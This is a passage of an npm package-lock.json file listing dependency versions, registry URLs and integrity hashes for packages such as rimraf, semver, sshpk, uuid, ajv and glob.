"~0.7.0", "aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" }, "engines": { "node": ">= 6" } }, "node_modules/resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "dependencies": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" }, "bin": { "resolve": "bin/resolve" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==", "engines": { "node": "*" } }, "node_modules/rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "dependencies": { "glob": "^7.1.3" }, "bin": { "rimraf": "bin.js" } }, "node_modules/safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "node_modules/safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "node_modules/semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==", "bin": { "semver": "bin/semver" } }, "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true, "engines": { "node": ">=14" }, "funding": { "url": "https://github.com/sponsors/isaacs" } }, "node_modules/slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==", "engines": { "node": "*" } }, "node_modules/spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "dependencies": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-exceptions": { "version": "2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "node_modules/spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "dependencies": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "node_modules/spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "node_modules/sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": "sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "dependencies": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" }, "bin": { "sshpk-conv": "bin/sshpk-conv", "sshpk-sign": "bin/sshpk-sign", "sshpk-verify": "bin/sshpk-verify" }, "engines": { "node": ">=0.10.0" } }, "node_modules/string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dependencies": { "safe-buffer": "~5.1.0" } }, "node_modules/string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" }, "engines": { "node": ">=8" } }, "node_modules/strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, "engines": { "node": ">=8" } }, "node_modules/supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", "engines": { "node": ">= 0.4" }, "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, "ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": 